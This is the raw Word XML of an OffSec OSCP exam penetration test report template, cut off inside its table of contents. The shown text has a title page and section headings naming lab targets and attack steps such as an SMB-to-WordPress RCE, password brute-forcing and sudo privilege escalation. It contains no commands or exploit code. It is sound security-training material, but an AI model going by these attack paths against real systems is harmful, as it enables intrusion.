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BAAC1" w14:textId="77777777" w:rsidR="00CB67CB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Title"/>
        <w:spacing w:before="200" w:after="240" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="60"/>
          <w:szCs w:val="60"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="60"/>
          <w:szCs w:val="60"/>
        </w:rPr>
        <w:t>OSCP Penetration Test Report</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F22A52C" w14:textId="77777777" w:rsidR="00CB67CB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="200" w:line="600" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>v.2.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F277AF2" w14:textId="77777777" w:rsidR="00CB67CB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>student@youremailaddress.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28A4A0AF" w14:textId="77777777" w:rsidR="00CB67CB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="200" w:line="480" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>OSID: XXXXX</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EB51C56" w14:textId="77777777" w:rsidR="00CB67CB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="200" w:line="600" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0417D262" wp14:editId="20EEBF49">
            <wp:extent cx="2234565" cy="2234565"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="20" name="image23.png" descr="A blue and purple circle with lines i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blue and purple circle with lines in it&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId7"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2234565" cy="2234565"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="150CE304" w14:textId="77777777" w:rsidR="00CB67CB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Copyright © 2023 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>OffSec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> Ltd. All rights reserved.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A6DC6C7" w14:textId="77777777" w:rsidR="00CB67CB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">No part of this publication, in whole or in part, may be reproduced, copied, transferred or any other right reserved to its copyright owner, including photocopying and all other copying, any transfer or transmission using any network or other means of communication, any broadcast for distant learning, in any form or by any means such as any information storage, transmission or retrieval system, without prior written permission from </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>OffSec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="506F8E38" w14:textId="77777777" w:rsidR="00CB67CB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="62AFD096" w14:textId="77777777" w:rsidR="00CB67CB" w:rsidRDefault="00CB67CB"/>
    <w:sdt>
      <w:sdtPr>
        <w:id w:val="1021431875"/>
        <w:docPartObj>
          <w:docPartGallery w:val="Table of Contents"/>
          <w:docPartUnique/>
        </w:docPartObj>
      </w:sdtPr>
      <w:sdtContent>
        <w:p w14:paraId="0DE1E6F5" w14:textId="77777777" w:rsidR="00CB67CB" w:rsidRDefault="00000000">
          <w:pPr>
            <w:widowControl w:val="0"/>
            <w:tabs>
              <w:tab w:val="right" w:pos="9350"/>
            </w:tabs>
            <w:spacing w:after="100"/>
          </w:pPr>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> TOC \h \u \z \t "Heading 1,1,Heading 2,2,Heading 3,3,Heading 4,4,Heading 5,5,Heading 6,6,"</w:instrText>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:hyperlink w:anchor="_gjdgxs">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>1. OffSec OSCP Exam Penetration Test Report</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:tab/>
              <w:t>3</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2E65FE07" w14:textId="77777777" w:rsidR="00CB67CB" w:rsidRDefault="00000000">
          <w:pPr>
            <w:widowControl w:val="0"/>
            <w:tabs>
              <w:tab w:val="right" w:pos="9350"/>
            </w:tabs>
            <w:spacing w:after="100"/>
            <w:ind w:left="200"/>
          </w:pPr>
          <w:hyperlink w:anchor="_30j0zll">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>1.1 Introduction</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:tab/>
              <w:t>3</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="19CF0ECA" w14:textId="77777777" w:rsidR="00CB67CB" w:rsidRDefault="00000000">
          <w:pPr>
            <w:widowControl w:val="0"/>
            <w:tabs>
              <w:tab w:val="right" w:pos="9350"/>
            </w:tabs>
            <w:spacing w:after="100"/>
            <w:ind w:left="200"/>
          </w:pPr>
          <w:hyperlink w:anchor="_1fob9te">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>1.2 Objective</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:tab/>
              <w:t>3</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3777105C" w14:textId="77777777" w:rsidR="00CB67CB" w:rsidRDefault="00000000">
          <w:pPr>
            <w:widowControl w:val="0"/>
            <w:tabs>
              <w:tab w:val="right" w:pos="9350"/>
            </w:tabs>
            <w:spacing w:after="100"/>
            <w:ind w:left="200"/>
          </w:pPr>
          <w:hyperlink w:anchor="_3znysh7">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>1.3 Requirements</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:tab/>
              <w:t>3</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6DBB5D01" w14:textId="77777777" w:rsidR="00CB67CB" w:rsidRDefault="00000000">
          <w:pPr>
            <w:widowControl w:val="0"/>
            <w:tabs>
              <w:tab w:val="right" w:pos="9350"/>
            </w:tabs>
            <w:spacing w:after="100"/>
          </w:pPr>
          <w:hyperlink w:anchor="_2et92p0">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>2. High-Level Summary</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:tab/>
              <w:t>4</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="47EBE96C" w14:textId="77777777" w:rsidR="00CB67CB" w:rsidRDefault="00000000">
          <w:pPr>
            <w:widowControl w:val="0"/>
            <w:tabs>
              <w:tab w:val="right" w:pos="9350"/>
            </w:tabs>
            <w:spacing w:after="100"/>
            <w:ind w:left="200"/>
          </w:pPr>
          <w:hyperlink w:anchor="_tyjcwt">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>2.1 Recommendations</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:tab/>
              <w:t>4</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4066AA07" w14:textId="77777777" w:rsidR="00CB67CB" w:rsidRDefault="00000000">
          <w:pPr>
            <w:widowControl w:val="0"/>
            <w:tabs>
              <w:tab w:val="right" w:pos="9350"/>
            </w:tabs>
            <w:spacing w:after="100"/>
          </w:pPr>
          <w:hyperlink w:anchor="_3dy6vkm">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>3. Methodologies</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:tab/>
              <w:t>4</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3D95A78F" w14:textId="77777777" w:rsidR="00CB67CB" w:rsidRDefault="00000000">
          <w:pPr>
            <w:widowControl w:val="0"/>
            <w:tabs>
              <w:tab w:val="right" w:pos="9350"/>
            </w:tabs>
            <w:spacing w:after="100"/>
            <w:ind w:left="200"/>
          </w:pPr>
          <w:hyperlink w:anchor="_1t3h5sf">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>3.1 Information Gathering</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:tab/>
              <w:t>4</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3149EAB2" w14:textId="77777777" w:rsidR="00CB67CB" w:rsidRDefault="00000000">
          <w:pPr>
            <w:widowControl w:val="0"/>
            <w:tabs>
              <w:tab w:val="right" w:pos="9350"/>
            </w:tabs>
            <w:spacing w:after="100"/>
            <w:ind w:left="200"/>
          </w:pPr>
          <w:hyperlink w:anchor="_4d34og8">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>3.2 Service Enumeration</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:tab/>
              <w:t>5</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7BBD8F05" w14:textId="77777777" w:rsidR="00CB67CB" w:rsidRDefault="00000000">
          <w:pPr>
            <w:widowControl w:val="0"/>
            <w:tabs>
              <w:tab w:val="right" w:pos="9350"/>
            </w:tabs>
            <w:spacing w:after="100"/>
            <w:ind w:left="200"/>
          </w:pPr>
          <w:hyperlink w:anchor="_2s8eyo1">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>3.3 Penetration</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:tab/>
              <w:t>5</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3224A349" w14:textId="77777777" w:rsidR="00CB67CB" w:rsidRDefault="00000000">
          <w:pPr>
            <w:widowControl w:val="0"/>
            <w:tabs>
              <w:tab w:val="right" w:pos="9350"/>
            </w:tabs>
            <w:spacing w:after="100"/>
            <w:ind w:left="200"/>
          </w:pPr>
          <w:hyperlink w:anchor="_17dp8vu">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>3.4 Maintaining Access</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:tab/>
              <w:t>5</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4298F3B9" w14:textId="77777777" w:rsidR="00CB67CB" w:rsidRDefault="00000000">
          <w:pPr>
            <w:widowControl w:val="0"/>
            <w:tabs>
              <w:tab w:val="right" w:pos="9350"/>
            </w:tabs>
            <w:spacing w:after="100"/>
            <w:ind w:left="200"/>
          </w:pPr>
          <w:hyperlink w:anchor="_3rdcrjn">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>3.5 House Cleaning</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:tab/>
              <w:t>5</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="00CACFA3" w14:textId="77777777" w:rsidR="00CB67CB" w:rsidRDefault="00000000">
          <w:pPr>
            <w:widowControl w:val="0"/>
            <w:tabs>
              <w:tab w:val="right" w:pos="9350"/>
            </w:tabs>
            <w:spacing w:after="100"/>
          </w:pPr>
          <w:hyperlink w:anchor="_26in1rg">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>4. Independent Challenges</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:tab/>
              <w:t>7</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7F8C4201" w14:textId="77777777" w:rsidR="00CB67CB" w:rsidRDefault="00000000">
          <w:pPr>
            <w:widowControl w:val="0"/>
            <w:tabs>
              <w:tab w:val="right" w:pos="9350"/>
            </w:tabs>
            <w:spacing w:after="100"/>
            <w:ind w:left="200"/>
          </w:pPr>
          <w:hyperlink w:anchor="_lnxbz9">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>4.1 Target #1 – 192.168.232.55</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:tab/>
              <w:t>7</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="42CD1D7F" w14:textId="47303BBD" w:rsidR="00CB67CB" w:rsidRDefault="00000000">
          <w:pPr>
            <w:widowControl w:val="0"/>
            <w:tabs>
              <w:tab w:val="right" w:pos="9350"/>
            </w:tabs>
            <w:spacing w:after="100"/>
            <w:ind w:left="400"/>
          </w:pPr>
          <w:hyperlink w:anchor="_35nkun2">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve">4.1.1 </w:t>
            </w:r>
            <w:r w:rsidR="003D6A84">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>Service Enumeration</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:tab/>
              <w:t>7</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="51F15D30" w14:textId="1D52DF85" w:rsidR="00CB67CB" w:rsidRDefault="00000000">
          <w:pPr>
            <w:widowControl w:val="0"/>
            <w:tabs>
              <w:tab w:val="right" w:pos="9350"/>
            </w:tabs>
            <w:spacing w:after="100"/>
            <w:ind w:left="400"/>
          </w:pPr>
          <w:hyperlink w:anchor="_1ksv4uv">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>4.1.</w:t>
            </w:r>
            <w:r w:rsidR="003D6A84">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="003D6A84" w:rsidRPr="003D6A84">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>Initial Access – Anonymous SMB share leads to Wordpress RCE</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:tab/>
              <w:t>7</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3390E24A" w14:textId="77777777" w:rsidR="00CB67CB" w:rsidRDefault="00000000">
          <w:pPr>
            <w:widowControl w:val="0"/>
            <w:tabs>
              <w:tab w:val="right" w:pos="9350"/>
            </w:tabs>
            <w:spacing w:after="100"/>
          </w:pPr>
          <w:hyperlink w:anchor="_44sinio">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>5. Active Directory Set</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:tab/>
              <w:t>21</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="58460148" w14:textId="77777777" w:rsidR="00CB67CB" w:rsidRDefault="00000000">
          <w:pPr>
            <w:widowControl w:val="0"/>
            <w:tabs>
              <w:tab w:val="right" w:pos="9350"/>
            </w:tabs>
            <w:spacing w:after="100"/>
            <w:ind w:left="200"/>
          </w:pPr>
          <w:hyperlink w:anchor="_2jxsxqh">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>5.1 Ajla – 10.4.4.10</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:tab/>
              <w:t>21</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="10ABFD2D" w14:textId="77777777" w:rsidR="00CB67CB" w:rsidRDefault="00000000">
          <w:pPr>
            <w:widowControl w:val="0"/>
            <w:tabs>
              <w:tab w:val="right" w:pos="9350"/>
            </w:tabs>
            <w:spacing w:after="100"/>
            <w:ind w:left="400"/>
          </w:pPr>
          <w:hyperlink w:anchor="_z337ya">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>5.1.1 Initial Access – Password Brute-Forcing</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:tab/>
              <w:t>21</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="311C6EE8" w14:textId="77777777" w:rsidR="00CB67CB" w:rsidRDefault="00000000">
          <w:pPr>
            <w:widowControl w:val="0"/>
            <w:tabs>
              <w:tab w:val="right" w:pos="9350"/>
            </w:tabs>
            <w:spacing w:after="100"/>
            <w:ind w:left="400"/>
          </w:pPr>
          <w:hyperlink w:anchor="_3j2qqm3">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>5.1.2 Privilege Escalation – Sudo group</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:tab/>
              <w:t>22</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2AD77FAB" w14:textId="77777777" w:rsidR="00CB67CB" w:rsidRDefault="00000000">
          <w:pPr>
            <w:widowControl w:val="0"/>
            <w:tabs>
              <w:tab w:val="right" w:pos="9350"/>
            </w:tabs>
            <w:spacing w:after="100"/>
            <w:ind w:left="400"/>
          </w:pPr>
          <w:hyperlink w:anchor="_1y810tw">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>5.1.3 Post-Exploitation</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:tab/>
              <w:t>22</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="28497E3E" w14:textId="77777777" w:rsidR="00CB67CB" w:rsidRDefault="00000000">
          <w:pPr>
            <w:widowControl w:val="0"/>
            <w:tabs>
              <w:tab w:val="right" w:pos="9350"/>
            </w:tabs>
            <w:spacing w:after="100"/>
            <w:ind w:left="200"/>
          </w:pPr>
          <w:hyperlink w:anchor="_4i7ojhp">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>5.2 Poultry – 10.5.5.20</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:tab/>
              <w:t>24</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="267CD011" w14:textId="77777777" w:rsidR="00CB67CB" w:rsidRDefault="00000000">
          <w:pPr>
            <w:widowControl w:val="0"/>
            <w:tabs>
              <w:tab w:val="right" w:pos="9350"/>
            </w:tabs>
            <w:spacing w:after="100"/>
            <w:ind w:left="400"/>
          </w:pPr>
          <w:hyperlink w:anchor="_2xcytpi">
